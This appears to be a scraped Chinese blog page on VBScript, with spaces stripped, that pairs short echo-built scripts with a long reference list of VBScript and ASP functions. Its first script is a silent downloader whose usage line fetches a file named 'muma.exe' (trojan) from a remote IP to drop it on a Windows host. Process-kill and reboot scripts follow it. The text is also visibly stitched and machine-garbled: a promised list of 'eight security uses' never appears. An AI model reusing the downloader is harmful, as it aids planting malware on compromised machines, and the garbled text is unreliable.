vbs脚本
1.文件下载(无回显)
echoiLocal=LCase(WScript.Arguments(1))>iget.vbe
echoiRemote=LCase(WScript.Arguments(0))>>iget.vbe
echoSetxPost=createObject(“Microsoft.XMLHTTP”)>>iget.vbe
echoxPost.Open”GET”,iRemote,0>>iget.vbe
echoxPost.Send()>>iget.vbe
echoSetsGet=createObject(“ADODB.Stream”)>>iget.vbe
echosGet.Mode=3>>iget.vbe
echosGet.Type=1>>iget.vbe
echosGet.Open()>>iget.vbe
echosGet.Write(xPost.responseBody)>>iget.vbe
echosGet.SaveToFileiLocal,2>>iget.vbe
用法:cscripthget.vbshttp://111.111.111.111/muma.exemuma.exe
2.列举进程
@echoforeachpsingetobject_>ps.vbs
@echo(“winmgmts:\\.\root\cimv2:win32_process”).instances_>>ps.vbs
@echowscript.echops.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next>>ps.vbs
用法:cscriptps.vbs
3.终止进程
@echoforeachpsingetobject_>pskill.vbs
@echo(“winmgmts:\\.\root\cimv2:win32_process”).instances_>>pskill.vbs
@echoifps.handle=wscript.arguments(0)thenwscript.echops.terminate:endif:next>>pskill.vbs
用法:cscriptpskill.vbspid
4.重启体系
@echoforeachosingetobject_>reboot.vbs
@echo(“winmgmts:!\\.\root\cimv2:win32_operatingsystem”).instances_>>reboot.vbs
@echoos.win32shutdown(2):next>>reboot.vbs
用法:cscriptreboot.vbs
VBS脚本在体系安全中的八则巧妙应用
VBS脚本病毒的很多流行使我们对VBS的功能有了一个全新的认识,现在我们对它也开端重视起来。VBS代码在本地是通过WindowsScriptHost(WSH)解说履行的。VBS脚本的履行离不开WSH,WSH是微软供给的一种基于32位Windows平台的、与语言无关的脚本解说机制,它使得脚本能够直接在Windows桌面或命令提示符下运转。使用WSH,用户能够操纵WSH目标、ActiveX目标、注册表和文件体系。在Windows2000下,还可用WSH来访问WindowsNT活动目录服务。
用VBS编写的脚本程序在窗口界面是由wscript.exe文件解说履行的,在字符界面由cscript.exe文件解说履行。wscript.exe是一个脚本语言解说器,正是它使得脚本能够被履行,就象履行批处理相同。关于VBS我们必定比我熟悉多了,所以再不废话,直接进入主题,看看我总结的VBS在体系安全中的八则妙用吧。
vbs指令大全
if….then若…则…
if…then…else若…则…非
elseif…非若
selectcase…群组选择条件
endselect
for…next计数循环
while…wend条件循环(一)
dowhile…loop条件循环(二)
do…loopwhile条件循环(三)
dountil…loop条件循环(四)
do…loopuntil条件循环(五)
数学函数
Abs绝对值
Sgn正负号
Hex转换成十六进制
Oct转换成八进制
Sqr平方根
Int取整数
Fix取整数
Round取整数
Log以e为底的对数
Sin正弦函数
Cos余弦函数
Tan正切函数
字符串处理函数
IsNull判断对象是否为空
Len字符串长度
Mid取部分字符串
Left从字符串开头取部分字符串
Right从字符串结尾取部分字符串
Lcase转换成小写
Ucase转换成大写
Trim清除字符串开头及结尾的空格符
Ltrim清除字符串开头空格符
Rtrim清除字符串结尾空格符
Replace替换字符串部分字符
Instr判断是否包含于另一个字符串(从起始搜寻)
InstrRev判断是否包含于另一个字符串(从结尾搜寻)
Space任意字符数的空格符
String任意字符数的任一字符
StrReverse反转字符串
Split以某字符分割字符串
数据类型转换函数
Cint转换成整形
Cstr转换成字符串
Clng转换成长整数
Cbool转换成布尔函数
Cdate转换成日期函数
CSng转换成单精度
CDbl转换成双精度
日期时间函数
Date现在日期
Time现在时间
NOw现在日期时间
DateAdd增加日期
DateDiff两日期差
DateSerial日期设定
Datevalue日期设定
Year现在年份
Month现在月份
Day现在天
Hour现在时刻
Minute现在分钟
Second现在秒钟
Timer午夜距现在秒数
TimeSerial时间设定
Timevalue时间所属部分
WeekDay星期名称
MonthName月份名称
其它函数
Array产生数组
Asc字符ASCII码
ChrASCII码字符
Filter过滤数组
InputBox输入窗口
Join合并数组中的元素
MsgBox信息窗口
Lbound数组下界
Ubound数组上界
指令
Const设定常数
Dim定义变量或者数组
Erase清除数组
ReDim重新声明数组
Randomize起始随机数
Rnd取得随机数
ASP对象
Session对象
IsEmpty测试Session变量是否存在
TimeOut设定Session变量生存周期
Abandon强制清除Session变量
Application对象
IsEmpty测试Application变量是否存在
Lock锁定Application变量
Unlock解除Lock指令的锁定
Cookies对象
Expires设定Cookies变量的生存周期
Connection对象
Open打开与数据库的连接
Execute打开Recordset对象
Close关闭Connection对象
Recordset对象
movefirst将记录指针移至第一条
movelast将记录指针移至最后一条
movenext将记录指针移至下一条
moveprevious将记录指针移至上一条
bof测试是否为recordset的起始
eof测试是否为recordset的结束
open打开Recoreset对象
close关闭recordset对象
fields读取数据的子对象
fileds.count字段个数
pagesize每页记录条数
absolutepage设定为某页
pagecount总页数
Absoluteposition直接跳至某条记录
评论前必须登录!
注册